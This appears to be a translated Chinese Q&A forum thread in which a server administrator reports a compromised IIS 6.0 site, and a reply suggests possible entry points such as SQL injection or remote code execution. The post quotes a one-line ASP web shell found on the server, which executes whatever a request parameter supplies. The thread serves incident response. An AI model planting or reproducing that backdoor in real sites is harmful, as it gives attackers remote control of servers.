1

我的一位客户在谷歌搜索结果中注意到一条消息,称他们的网站可能已被黑客入侵。经过一番挖掘,我在服务器上发现了包含 seo 垃圾和 javascript 引用的 html 文件。我删除了这些文件,更改了 cms 密码,更新了一些组件,如 CKFinder 等......

然后我开始查看服务器上的其他站点,并发现大量带有这一行的 .asp 文件

<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile

我已经删除了这些,但不知道它们是如何到达那里的。我查看了各种日志(事件查看器、网站、ftp),但大多数都没有从文件创建时回溯到足够远的地方。

我已经更新了仅过时一两个月的操作系统,并更改了 ftp 访问。

我还能做些什么来找到入口点或确保我的服务器和站点是安全的?

顺便说一句:这是运行 IIS 6.0 的 Windows 2003 服务器。

4

1 回答 1

0

他们可能通过多种方式访问​​您的服务器。

您运行的是通用的 CMS 还是自定义的?他们可能在您的某个脚本中发现了漏洞。

例如,如果他们发现了 SQL 注入漏洞,他们可以检索数据库信息。如果他们在哪里可以找到 RCE 错误(远程代码执行),他们可能已经能够执行导致创建这些任意文件的系统命令。

除此之外,windows server 中还有一些漏洞已在本周修复,请查看此链接:http: //blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html

于 2014-02-27T01:34:59.147 回答